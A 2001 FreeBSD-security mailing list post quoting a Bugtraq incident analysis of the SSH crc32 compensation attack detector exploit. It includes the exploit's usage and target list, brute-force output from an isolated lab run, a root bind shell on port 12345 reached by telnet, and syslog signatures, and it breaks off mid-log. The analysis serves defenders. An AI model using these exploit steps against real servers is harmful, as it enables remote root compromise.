From owner-freebsd-security Sun Nov 18 11:57:55 2001 Delivered-To: freebsd-security@freebsd.org Received: from lariat.org (lariat.org [12.23.109.2]) by hub.freebsd.org (Postfix) with ESMTP id 02F0337B41A for ; Sun, 18 Nov 2001 11:57:04 -0800 (PST) Received: from mustang.lariat.org (IDENT:ppp0.lariat.org@lariat.org [12.23.109.2]) by lariat.org (8.9.3/8.9.3) with ESMTP id MAA09876 for ; Sun, 18 Nov 2001 12:56:17 -0700 (MST) Message-Id: <4.3.2.7.2.20011118124921.041ea050@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Version 4.3.2 Date: Sun, 18 Nov 2001 12:56:07 -0700 To: security@freebsd.org From: Brett Glass Subject: Patching 4.4-RELEASE against SSHv1 exploit Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org In a recent message to Bugtraq (quoted below), Dave Dittrich notes that an SSH exploit has been specifically tuned to attack machines running FreeBSD 4.x and certain versions of SSH. The hole apparently dates back to the liberally licensed versions of SSH, and so is present in both OpenSSH and SSH, Inc.'s SSH. Is 4.4-RELEASE vulnerable in the default install if sshd is enabled? If so, is there a patch? --Brett Glass >Mailing-List: contact incidents-help@securityfocus.com; run by ezmlm >Precedence: bulk >List-Id: >List-Post: >List-Help: >List-Unsubscribe: >List-Subscribe: >Delivered-To: mailing list incidents@securityfocus.com >Delivered-To: moderator for incidents@securityfocus.com >Received: (qmail 20641 invoked from network); 9 Nov 2001 08:18:29 -0000 >Date: Thu, 8 Nov 2001 23:32:32 -0800 (PST) >From: Dave Dittrich >To: BUGTRAQ@securityfocus.com, > Incidents Mailing List , > >Subject: Analysis of SSH crc32 compensation attack detector exploit >Message-ID: > >MIME-Version: 1.0 >Content-Type: TEXT/PLAIN; charset=US-ASCII >X-UIDL: fdfe8031c160ae74dcef09cf4731d342 > > > > ========================================================== > Analysis of SSH crc32 compensation attack detector exploit > ========================================================== > > >Copyright (C) 2001, David A. Dittrich >Thu Nov 8 23:31:20 PST 2001 > >Summary of incident >=================== > >On October 6, 2001, intruders originating from network blocks >in the Netherlands used an exploit for the crc32 compensation attack >detector vulnerability to remotely compromise a Red Hat Linux >system on the UW network running OpenSSH 2.1.1. This vulnerability is >described in CERT Vulnerability note VU#945216: > > http://www.kb.cert.org/vuls/id/945216 > >Once in the system, a series of operating system commands were >replaced with trojan horses to provide back doors for later entry >and to conceal the presence of the intruders in the system. A second >SSH server was run on a high numbered port (39999/tcp). The system >was then used for broad scanning (outbound from the UW network) to >identify more systems running OpenSSH 2.1.1, some of which were >then attacked manually. > >Artifacts and logs were recovered from the system and analyzed. > >[NOTE: This particular exploit is presumed to be independent of any >root kits or tool kits, so do not expect these same attributes to be >present on all systems attacking with an SSH crc32 exploit.] > >The exploit is based on the source code for OpenSSH 2.2.0 (which >is the follow on to version 2.1.1, and patched a vulnerability in the >crc32 compensation attack detection function). It is is actively being >used against systems running OpenSSH 2.1.1 servers which suffer from >this vulnerability, and has been successfully used against SSH.com >version 1.2.31 as well. (Other implementations of SSH protocol 1 >and versions have not been tested to date.) > >The analyzed exploit lists the following targets: > > linux/x86 ssh.com 1.2.26-1.2.31 rhl > linux/x86 openssh 1.2.3 (maybe others) > linux/x86 openssh 2.2.0p1 (maybe others) > freebsd 4.x, ssh.com 1.2.26-1.2.31 rhl > >While this exploit shows multiple targets, the attackers in this case >were only scanning for 22/tcp, then connecting to those systems that >respond to get the server version and explicitly looking for only >"OpenSSH_2.1.1". These were rapid SYN scans, using a tool that >comes with the t0rn root kit. > >Analysis of the compromised system revealed that 47067 addresses had >been scanned (totalling 25386 unique hosts -- it is not clear why >there is such a large overlap.) Of the hosts scanned, 1244 vulnerable >hosts were identified, and the intruders had successfully exploited >and entered 4 hosts before the system was taken off-line on October 8. > >Other reports of 22/tcp scanning have come in since October 8, and it >is believed that this exploit is circulating among IRC chat channels. > >The exploit does not work against systems that use access control >restrictions (e.g., SSH.com's "AllowHosts" or "DenyHosts" settings) >or packet level filters (e.g., ipchains, iptables, ipf) which would >prevent a host from attempting to exchange public keys. The >vulnerability requires being able to enter cryptographic key exchange >negotiation with the server to properly manipulate the stack. > > >Background on the vulnerability and exploit >=========================================== > >This vulnerability was first announced by CORE-SDI in their advisory >CORE-20010207, dated February 8, 2001: > > http://www.securityfocus.com/advisories/3088 > >Other advisories and bug descriptions are: > > http://xforce.iss.net/alerts/advise100.php > http://razor.bindview.com/publish/advisories/adv_ssh1crc.html > http://www.securityfocus.com/bugid=2347 > >On October 21, 2001, a thread was started by Jay Dyson on the >incidents@securityfocus.com email list about scans for SSH servers >originating from RIPE net blocks: > > >http://www.securityfocus.com/cgi-bin/archive.pl?id=75&start=2001-10-27&end=2001-11-02&mid=221998&threads=1 > >Other groups have, or are working on, studies of scanning for >22/tcp around the globe. > >A discussion on the vuln-dev@securityfocus.com email list prompted the >following Newsbytes story about selling such an exploit for $1000: > > Hackers Put A Price Tag On New Attack Tool > http://www.newsbytes.com/news/01/171291.html > > >[NOTE: The vulnerability is in the source code for SSH protocol 1, >not for SSH on a particular hardware architecture. Unconfirmed rumors >exist that indicate shell code for Solaris 8/SPARC SSH.com 1.2.26-31 >may also exist, so ALL ARCHITECTURES should be considered potentially >vulnerable, not just Linux/i386.] > > >Vendor advisories, statements, and patch information >==================================================== > > http://www.ssh.com/products/ssh/advisories/ssh1_crc-32.cfm > http://openssh.org/security.html > http://www.cisco.com/warp/public/707/SSH-multiple-pub.html > > >Runtime analysis of the exploit >=============================== > >The exploit was tested on an isolated network segment, using a network >address of 10.10.10.0/24, with attacking host using 10.10.10.10 and >victim host using 10.10.10.3. > >The victim is running SSH.com's version 1.2.31 compiled on Red Hat >Linux 6.0 (Kernel 2.2.16-3 on an i586). > >The attacking host was running Fred Cohen's PLAC[1] (CD-ROM bootable >Linux 2.4.5 system, employing a ram disk for the root partition.) >Files were copied onto the system using "nc" (Netcat)[2]. > >This configuration allows some safety in the event the exploit (which >was reviewed in a cursory fashion by "reqt" disassembly[3]) actually >has some malicious code. The non-routable network address and >isolated subnet also prevent potential damage. > > >Attacker's view >=============== > >When run with no arguments, the exploit presents the user with usage >information: > > =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= >root@plac /bin >> ./ssh > > >linux/x86 sshd1 exploit by zip/TESO (zip@james.kalifornia.com) - ripped from >openssh 2.2.0 src > >greets: mray, random, big t, sh1fty, scut, dvorak >ps. this sploit already owned cia.gov :/ > >**please pick a type** > >Usage: ./ssh host [options] >Options: > -p port > -b base Base address to start bruteforcing distance, by default > 0x1800, >goes as high as 0x10000 > -t type > -d debug mode > -o Add this to delta_min > >types: > >0: linux/x86 ssh.com 1.2.26-1.2.31 rhl >1: linux/x86 openssh 1.2.3 (maybe others) >2: linux/x86 openssh 2.2.0p1 (maybe others) >3: freebsd 4.x, ssh.com 1.2.26-1.2.31 rhl > =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= > > >[NOTE: Other versions of this exploit that are circulating have other >options listed which affect the same hosts, but support a different >back door port, in one case 3879/tcp, and require a special >environment variable be set to protect execution (See the README file >in Appendix B.) This may be a defensive mechanism against the exploit >being stolen or discovered.] > >Our victim system is running SSH.com version 1.2.31 (unpatched) >on port 2222, with syslog logging directed to a separate file >("sshdx.log", excerpts shown below). > >We select type 0 and attack our server on port 2222: > > =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= >root@plac /bin >> ./ssh 10.10.10.3 -p 2222 -t 0 > > >linux/x86 sshd1 exploit by zip/TESO (zip@james.kalifornia.com) - ripped from >openssh 2.2.0 src > >greets: mray, random, big t, sh1fty, scut, dvorak >ps. this sploit already owned cia.gov :/ > >........................... >bruteforced distance: 0x3200 >bruteforcing distance from h->partial packet buffer on stack >..............^[[A................|////////\\\\! >bruteforced h->ident buff distance: 5bfbed88 > >trying retloc_delta: 35 >....! >found high words of possible return address: 808 >trying to exploit >.... >trying retloc_delta: 37 >.! >found high words of possible return address: 805 >trying to exploit >.... >trying retloc_delta: 39 >...... >trying retloc_delta: 3b >...... >trying retloc_delta: 3d >! >found high words of possible return address: 804 >trying to exploit >.... >trying retloc_delta: 3f >...... > =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= > > >At this point, the exploit tool appears to "hang". Switching to the >victim system, things have changed. > > > >Victim's view >============== > >Prior to the exploit, the victim system shows the standard SSH daemon >on port 22/tcp, and our vulnerable daemon on port 2222/tcp. Both are >listening, and the standard SSH daemon has one incoming connection >(10.10.10.2:33354): > > =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= >[root@victim /root]# netstat -an --inet >Active Internet connections (servers and established) >Proto Recv-Q Send-Q Local Address Foreign Address State >tcp 0 0 10.10.10.3:2222 0.0.0.0:* LISTEN >tcp 0 0 >10.10.10.3:22 10.10.10.2:33354 ESTABLISHED >tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN >raw 0 0 0.0.0.0:1 0.0.0.0:* 7 >raw 0 0 0.0.0.0:6 0.0.0.0:* 7 > =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= > > >After the above exploit had run to the point of the apparent "hang", >a new listening service port is now visible on 12345/tcp: > > =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= >[root@victim /root]# netstat -an --inet >Active Internet connections (servers and established) >Proto Recv-Q Send-Q Local Address Foreign Address State >tcp 0 0 0.0.0.0:12345 0.0.0.0:* LISTEN >tcp 0 0 >10.10.10.3:2222 10.10.10.10:32965 ESTABLISHED >tcp 0 0 10.10.10.3:2222 0.0.0.0:* LISTEN >tcp 0 0 >10.10.10.3:22 10.10.10.2:33354 ESTABLISHED >tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN >raw 0 0 0.0.0.0:1 0.0.0.0:* 7 >raw 0 0 0.0.0.0:6 0.0.0.0:* 7 > =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= > > >During a second "attack", a netstat is run. During the attack >window, the multiple brute force attack attempts are visible: > > =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= >[root@victim /root]# netstat -an --inet >Active Internet connections (servers and established) >Proto Recv-Q Send-Q Local Address Foreign Address State >tcp 0 0 0.0.0.0:12345 0.0.0.0:* LISTEN >tcp 1252 0 >10.10.10.3:2222 10.10.10.10:33076 ESTABLISHED >tcp 0 0 10.10.10.3:2222 10.10.10.10:33075 TIME_WAIT >tcp 0 0 10.10.10.3:2222 10.10.10.10:33074 TIME_WAIT >tcp 0 0 10.10.10.3:2222 10.10.10.10:33072 TIME_WAIT >tcp 0 0 10.10.10.3:2222 10.10.10.10:33071 TIME_WAIT >tcp 0 0 10.10.10.3:2222 10.10.10.10:33069 TIME_WAIT >tcp 0 0 10.10.10.3:2222 10.10.10.10:33067 TIME_WAIT >tcp 0 0 10.10.10.3:2222 10.10.10.10:33066 TIME_WAIT >tcp 0 0 10.10.10.3:2222 10.10.10.10:33064 TIME_WAIT >tcp 0 0 10.10.10.3:2222 10.10.10.10:33063 TIME_WAIT >tcp 0 0 10.10.10.3:2222 10.10.10.10:33062 TIME_WAIT >tcp 0 0 10.10.10.3:2222 10.10.10.10:33061 TIME_WAIT >tcp 0 0 10.10.10.3:2222 10.10.10.10:33060 TIME_WAIT >tcp 0 0 10.10.10.3:2222 10.10.10.10:33059 TIME_WAIT >tcp 0 0 10.10.10.3:2222 10.10.10.10:33058 TIME_WAIT >tcp 0 0 10.10.10.3:2222 10.10.10.10:33056 TIME_WAIT >tcp 0 0 10.10.10.3:2222 10.10.10.10:33055 TIME_WAIT >tcp 0 0 10.10.10.3:2222 10.10.10.10:33053 TIME_WAIT >tcp 0 0 10.10.10.3:2222 10.10.10.10:33051 TIME_WAIT >tcp 0 0 10.10.10.3:2222 10.10.10.10:33050 TIME_WAIT >tcp 0 0 10.10.10.3:2222 10.10.10.10:33048 TIME_WAIT >tcp 0 0 10.10.10.3:2222 10.10.10.10:33047 TIME_WAIT >tcp 0 0 10.10.10.3:2222 10.10.10.10:33046 TIME_WAIT >tcp 0 0 10.10.10.3:2222 10.10.10.10:33042 TIME_WAIT >tcp 0 0 10.10.10.3:2222 10.10.10.10:33041 TIME_WAIT >tcp 0 0 10.10.10.3:2222 10.10.10.10:33040 TIME_WAIT >tcp 0 0 10.10.10.3:2222 10.10.10.10:33039 TIME_WAIT >tcp 0 0 10.10.10.3:2222 10.10.10.10:33038 TIME_WAIT >tcp 0 0 10.10.10.3:2222 10.10.10.10:33036 TIME_WAIT >tcp 0 0 10.10.10.3:2222 10.10.10.10:33035 TIME_WAIT >tcp 0 0 10.10.10.3:2222 10.10.10.10:33034 TIME_WAIT >tcp 0 0 10.10.10.3:2222 10.10.10.10:33033 TIME_WAIT >tcp 0 0 10.10.10.3:2222 10.10.10.10:33032 TIME_WAIT >tcp 0 0 10.10.10.3:2222 10.10.10.10:33030 TIME_WAIT >tcp 0 0 10.10.10.3:2222 10.10.10.10:33029 TIME_WAIT >tcp 0 0 10.10.10.3:2222 10.10.10.10:33028 TIME_WAIT >tcp 0 0 10.10.10.3:2222 10.10.10.10:33027 TIME_WAIT >tcp 0 0 10.10.10.3:2222 10.10.10.10:33024 TIME_WAIT >tcp 0 0 10.10.10.3:2222 10.10.10.10:33023 TIME_WAIT >tcp 0 0 10.10.10.3:2222 10.10.10.10:33022 TIME_WAIT >tcp 0 0 10.10.10.3:2222 10.10.10.10:33021 TIME_WAIT >tcp 0 0 10.10.10.3:2222 10.10.10.10:33020 TIME_WAIT >tcp 0 0 10.10.10.3:2222 10.10.10.10:33016 TIME_WAIT >tcp 0 0 10.10.10.3:2222 10.10.10.10:33014 TIME_WAIT >tcp 0 0 10.10.10.3:2222 0.0.0.0:* LISTEN >tcp 0 0 >10.10.10.3:22 10.10.10.2:33354 ESTABLISHED >tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN >raw 0 0 0.0.0.0:1 0.0.0.0:* 7 >raw 0 0 0.0.0.0:6 0.0.0.0:* 7 > =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= > > >LiSt Open Files ("lsof")[4] shows the vulnerable SSH daemon has now >opened a new listening port: > > =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= >[root@victim /root]# lsof -p 9364 >COMMAND PID USER FD TYPE DEVICE SIZE NODE NAME >sshd 9364 root cwd DIR 3,3 1024 2 / >sshd 9364 root rtd DIR 3,3 1024 2 / >sshd 9364 root txt REG 3,3 655038 442413 >/usr/local/src/ssh-1.2.31/sbin/sshd1 >sshd 9364 root mem REG 3,3 340771 30722 /lib/ld-2.1.3.so >sshd 9364 root mem REG 3,3 370141 31107 /lib/libnsl-2.1.3.so >sshd 9364 root mem REG 3,3 66231 31103 /lib/libcrypt-2.1.3.so >sshd 9364 root mem REG 3,3 47008 31113 /lib/libutil-2.1.3.so >sshd 9364 root mem REG 3,3 4101836 31102 /lib/libc-2.1.3.so >sshd 9364 root mem REG 3,3 246652 31109 /lib/libnss_files-2.1.3.so >sshd 9364 root mem REG 3,3 252234 31111 >/lib/libnss_nisplus-2.1.3.so >sshd 9364 root mem REG 3,3 255963 31110 /lib/libnss_nis-2.1.3.so >sshd 9364 root mem REG 3,3 67580 31108 /lib/libnss_dns-2.1.3.so >sshd 9364 root mem REG 3,3 169720 31112 /lib/libresolv-2.1.3.so >sshd 9364 root 0u CHR 1,3 4110 /dev/null >sshd 9364 root 1u CHR 1,3 4110 /dev/null >sshd 9364 root 2u CHR 1,3 4110 /dev/null >sshd 9364 root 3u inet 10202 TCP *:12345 (LISTEN) >sshd 9364 root 4u inet 10197 TCP >10.10.10.3:2222->10.10.10.10:33190 (CLOSE_WAIT) > =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= > > >A successful exploit >==================== > >Now comes the fun part. The exploit does the typical "bind a shell >to a high-numbered TCP port" trick, which also is visible in >"netstat" output (12345/tcp): > > =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= >[root@victim /root]# netstat -an --inet >Active Internet connections (servers and established) >Proto Recv-Q Send-Q Local Address Foreign Address State >tcp 0 0 >10.10.10.3:12345 10.10.10.10:33077 ESTABLISHED >tcp 0 0 0.0.0.0:12345 0.0.0.0:* LISTEN >tcp 1252 0 >10.10.10.3:2222 10.10.10.10:33076 ESTABLISHED >tcp 0 0 10.10.10.3:2222 0.0.0.0:* LISTEN >tcp 0 0 >10.10.10.3:22 10.10.10.2:33354 ESTABLISHED >tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN >raw 0 0 0.0.0.0:1 0.0.0.0:* 7 >raw 0 0 0.0.0.0:6 0.0.0.0:* 7 > =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= > > >All that is necessary is for the attacker to then use "telnet" or "nc" >(Netcat) to connect to this port and start executing commands from the >shell (it is necessary to end each command line with a semi-colon), >or to pipe commands from a shell script (this automation method is >common, e.g. as seen in the analysis of trin00 published in 1999 >in connection with DDoS attacks using that tool.) > >[NOTE: Feedback from a reviewer of this analysis indicates that if you >use "nc" to connect to the back door port, rather than "telnet", you >don't need to terminate commands to the shell with semicolons. Nc >adds in the newline character that the shell recognizes as a command >terminator.] > > =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= >root@plac ~ >> telnet 10.10.10.3 12345 >Trying 10.10.10.3... >Connected to 10.10.10.3. >Escape character is '^]'. >id; >uid=0(root) gid=0(root) >groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) >date; >Thu Nov 1 18:04:42 PST 2001 >netstat -an --inet; >Active Internet connections (servers and established) >Proto Recv-Q Send-Q Local Address Foreign Address State >tcp 0 0 >10.10.10.3:12345 10.10.10.10:33077 ESTABLISHED >tcp 0 0 0.0.0.0:12345 0.0.0.0:* LISTEN >tcp 1252 0 >10.10.10.3:2222 10.10.10.10:33076 ESTABLISHED >tcp 0 0 10.10.10.3:2222 0.0.0.0:* LISTEN >tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN >raw 0 0 0.0.0.0:1 0.0.0.0:* 7 >raw 0 0 0.0.0.0:6 0.0.0.0:* 7 >exit; >Connection closed by foreign host. >root@plac ~ >> > =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= > > >Once the attacker exits the shell, things on the victim system go back >to normal: > > =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= >[root@victim /root]# netstat -an --inet >Active Internet connections (servers and established) >Proto Recv-Q Send-Q Local Address Foreign Address State >tcp 0 0 10.10.10.3:2222 0.0.0.0:* LISTEN >tcp 0 0 >10.10.10.3:22 10.10.10.2:33354 ESTABLISHED >tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN >raw 0 0 0.0.0.0:1 0.0.0.0:* 7 >raw 0 0 0.0.0.0:6 0.0.0.0:* 7 > =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= > > >If syslog logging is enabled, the connections and brute force attempts >are quite visible (remember, this is stock SSH.com 1.2.31 on >Red Hat Linux 6.0 -- syslog signatures for OpenSSH were not obtained >in this analysis): > > =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= >Nov 1 18:46:14 victim sshd[9510]: log: Connection from 10.10.10.10 port 33298 >Nov 1 18:46:19 victim sshd[9511]: log: Connection from 10.10.10.10 port 33299 >Nov 1 18:46:22 victim sshd[9512]: log: Connection from 10.10.10.10 port 33300 >Nov 1 18:46:26 victim sshd[9513]: log: Connection from 10.10.10.10 port 33301 >Nov 1 18:46:31 victim sshd[9515]: log: Connection from 10.10.10.10 port 33302 >Nov 1 18:46:35 victim sshd[9516]: log: Connection from 10.10.10.10 port 33303 >Nov 1 18:46:39 victim sshd[9517]: log: Connection from 10.10.10.10 port 33304 >Nov 1 18:46:43 victim sshd[9518]: log: Connection from 10.10.10.10 port 33305 >Nov 1 18:46:47 victim sshd[9518]: fatal: Local: Corrupted check bytes >on input. >Nov 1 18:46:47 victim sshd[9519]: log: Connection from 10.10.10.10 port 33306 >Nov 1 18:46:52 victim sshd[9519]: fatal: Connection closed by remote host. >Nov 1 18:46:53 victim sshd[9520]: log: Connection from 10.10.10.10 port 33307 >Nov 1 18:46:57 victim sshd[9521]: log: Connection from 10.10.10.10 port 33308 >Nov 1 18:47:01 victim sshd[9522]: log: Connection from 10.10.10.10 port 33309 >Nov 1 18:47:06 victim sshd[9523]: log: Connection from 10.10.10.10 port 33310 >Nov 1 18:47:10 victim sshd[9524]: log: Connection from 10.10.10.10 port 33311 >Nov 1 18:47:14 victim sshd[9525]: log: Connection from 10.10.10.10 port 33312 >Nov 1 18:47:19 victim sshd[9526]: log: Connection from 10.10.10.10 port 33313 >Nov 1 18:47:24 victim sshd[9527]: log: Connection from 10.10.10.10 port 33314 >Nov 1 18:47:24 victim sshd[9527]: fatal: Connection closed by remote host. >Nov 1 18:47:46 victim sshd[9528]: log: Connection from 10.10.10.10 port 33315 >Nov 1 18:47:46 victim sshd[9529]: log: Connection from 10.10.10.10 port 33316 >Nov 1 18:47:47 victim sshd[9530]: log: Connection from 10.10.10.10 port 33317 >Nov 1 18:47:47 victim sshd[9531]: log: Connection from 10.10.10.10 port 33318 >Nov 1 18:47:47 victim sshd[9532]: log: Connection from 10.10.10.10 port 33319 >Nov 1 18:47:48 victim sshd[9533]: log: Connection from 10.10.10.10 port 33320 >Nov 1 18:47:48 victim sshd[9534]: log: Connection from 10.10.10.10 port 33321 >Nov 1 18:47:48 victim sshd[9535]: log: Connection from 10.10.10.10 port 33322 >Nov 1 18:47:49 victim sshd[9536]: log: Connection from 10.10.10.10 port 33323 >Nov 1 18:47:49 victim sshd[9537]: log: Connection from 10.10.10.10 port 33324 >Nov 1 18:47:50 victim sshd[9538]: log: Connection from 10.10.10.10 port 33325 >Nov 1 18:47:50 victim sshd[9539]: log: Connection from 10.10.10.10 port 33326 >Nov 1 18:47:50 victim sshd[9540]: log: Connection from 10.10.10.10 port 33327 >Nov 1 18:47:51 victim sshd[9541]: log: Connection from 10.10.10.10 port 33328 >Nov 1 18:47:51 victim sshd[9542]: log: Connection from 10.10.10.10 port 33329 >Nov 1 18:47:51 victim sshd[9543]: log: Connection from 10.10.10.10 port 33330 >Nov 1 18:47:52 victim sshd[9544]: log: Connection from 10.10.10.10 port 33331 >Nov 1 18:47:52 victim sshd[9545]: log: Connection from 10.10.10.10 port 33332 >Nov 1 18:47:52 victim sshd[9546]: log: Connection from 10.10.10.10 port 33333 >Nov 1 18:47:53 victim sshd[9547]: log: Connection from 10.10.10.10 port 33334 >Nov 1 18:47:53 victim sshd[9548]: log: Connection from 10.10.10.10 port 33335 >Nov 1 18:47:54 victim sshd[9549]: log: Connection from 10.10.10.10 port 33336 >Nov 1 18:47:54 victim sshd[9550]: log: Connection from 10.10.10.10 port 33337 >Nov 1 18:47:54 victim sshd[9551]: log: Connection from 10.10.10.10 port 33338 >Nov 1 18:47:55 victim sshd[9552]: log: Connection from 10.10.10.10 port 33339 >Nov 1 18:47:55 victim sshd[9553]: log: Connection from 10.10.10.10 port 33340 >Nov 1 18:47:55 victim sshd[9554]: log: Connection from 10.10.10.10 port 33341 >Nov 1 18:47:56 victim sshd[9555]: log: Connection from 10.10.10.10 port 33342 >Nov 1 18:47:56 victim sshd[9556]: log: Connection from 10.10.10.10 port 33343 >Nov 1 18:47:56 victim sshd[9555]: fatal: Local: Corrupted check bytes >on input. >Nov 1 18:47:57 victim sshd[9557]: log: Connection from 10.10.10.10 port 33344 >Nov 1 18:47:57 victim sshd[9558]: log: Connection from 10.10.10.10 port 33345 >Nov 1 18:47:57 victim sshd[9559]: log: Connection from 10.10.10.10 port 33346 >Nov 1 18:47:58 victim sshd[9560]: log: Connection from 10.10.10.10 port 33347 >Nov 1 18:47:58 victim sshd[9561]: log: Connection from 10.10.10.10 port 33348 >Nov 1 18:47:59 victim sshd[9562]: log: Connection from 10.10.10.10 port 33349 >Nov 1 18:47:59 victim sshd[9563]: log: Connection from 10.10.10.10 port 33350 >Nov 1 18:47:59 victim sshd[9564]: log: Connection from 10.10.10.10 port 33351 >Nov 1 18:48:00 victim sshd[9565]: log: Connection from 10.10.10.10 port 33352 >Nov 1 18:48:00 victim sshd[9566]: log: Connection from 10.10.10.10 port 33353 >Nov 1 18:48:00 victim sshd[9567]: log: Connection from 10.10.10.10 port 33354 >Nov 1 18:48:01 victim sshd[9568]: log: Connection from 10.10.10.10 port 33355 >Nov 1 18:48:01 victim sshd[9569]: log: Connection from 10.10.10.10 port 33356 >Nov 1 18:48:02 victim sshd[9570]: log: Connection from 10.10.10.10 port 33357 >Nov 1 18:48:02 victim sshd[9571]: log: Connection from 10.10.10.10 port 33358 >Nov 1 18:48:02 victim sshd[9572]: log: Connection from 10.10.10.10 port 33359 >Nov 1 18:48:03 victim sshd[9573]: log: Connection from 10.10.10.10 port 33360 >Nov 1 18:48:03 victim sshd[9574]: log: Connection from 10.10.10.10 port 33361 >Nov 1 18:48:03 victim sshd[9575]: log: Connection from 10.10.10.10 port 33362 >Nov 1 18:48:04 victim sshd[9576]: log: Connection from 10.10.10.10 port 33363 >Nov 1 18:48:04 victim sshd[9577]: log: Connection from 10.10.10.10 port 33364 >Nov 1 18:48:04 victim sshd[9578]: log: Connection from 10.10.10.10 port 33365 >Nov 1 18:48:05 victim sshd[9579]: log: Connection from 10.10.10.10 port 33366 >Nov 1 18:48:05 victim sshd[9580]: log: Connection from 10.10.10.10 port 33367 >Nov 1 18:48:06 victim sshd[9581]: log: Connection from 10.10.10.10 port 33368 >Nov 1 18:48:06 victim sshd[9582]: log: Connection from 10.10.10.10 port 33369 >Nov 1 18:48:06 victim sshd[9583]: log: Connection from 10.10.10.10 port 33370 >Nov 1 18:48:07 victim sshd[9584]: log: Connection from 10.10.10.10 port 33371 >Nov 1 18:48:07 victim sshd[9585]: log: Connection from 10.10.10.10 port 33372 >Nov 1 18:48:07 victim sshd[9586]: log: Connection from 10.10.10.10 port 33373 >Nov 1 18:48:08 victim sshd[9587]: log: Connection from 10.10.10.10 port 33374 >Nov 1 18:48:08 victim sshd[9586]: fatal: Local: crc32 compensation >attack: network attack detected >Nov 1 18:48:08 victim sshd[9588]: log: Connection from 10.10.10.10 port 33375 >Nov 1 18:48:08 victim sshd[9587]: fatal: Local: crc32 compensation >attack: network attack detected >Nov 1 18:48:08 victim sshd[9589]: log: Connection from 10.10.10.10 port 33376 >Nov 1 18:48:08 victim sshd[9588]: fatal: Local: crc32 compensation >attack: network attack detected >Nov 1 18:48:09 victim sshd[9590]: log: Connection from 10.10.10.10 port 33377 >Nov 1 18:48:09 victim sshd[9589]: fatal: Local: crc32 compensation >attack: network attack detected >Nov 1 18:48:09 victim sshd[9591]: log: Connection from 10.10.10.10 port 33378 >Nov 1 18:48:09 victim sshd[9590]: fatal: Local: crc32 compensation >attack: network attack detected >Nov 1 18:48:09 victim sshd[9592]: log: Connection from 10.10.10.10 port 33379 >Nov 1 18:48:09 victim sshd[9591]: fatal: Local: crc32 compensation >attack: network attack detected >Nov 1 18:48:10 victim sshd[9592]: fatal: Local: crc32 compensation >attack: network attack detected >Nov 1 18:48:10 victim sshd[9593]: log: Connection from 10.10.10.10 port 33380 >Nov 1 18:48:10 victim sshd[9594]: log: Connection from 10.10.10.10 port 33381 >Nov 1 18:48:10 victim sshd[9593]: fatal: Local: crc32 compensation >attack: network attack detected >Nov 1 18:48:11 victim sshd[9595]: log: Connection from 10.10.10.10 port 33382 >Nov 1 18:48:11 victim sshd[9594]: fatal: Local: crc32 compensation >attack: network attack detected >Nov 1 18:48:11 victim sshd[9596]: log: Connection from 10.10.10.10 port 33383 >Nov 1 18:48:11 victim sshd[9597]: log: Connection from 10.10.10.10 port 33384 >Nov 1 18:48:11 victim sshd[9596]: fatal: Local: crc32 compensation >attack: network attack detected >Nov 1 18:48:12 victim sshd[9598]: log: Connection from 10.10.10.10 port 33385 >Nov 1 18:48:12 victim sshd[9597]: fatal: Local: crc32 compensation >attack: network attack detected >Nov 1 18:48:12 victim sshd[9599]: log: Connection from 10.10.10.10 port 33386 >Nov 1 18:48:12 victim sshd[9598]: fatal: Local: crc32 compensation >attack: network attack detected >Nov 1 18:48:12 victim 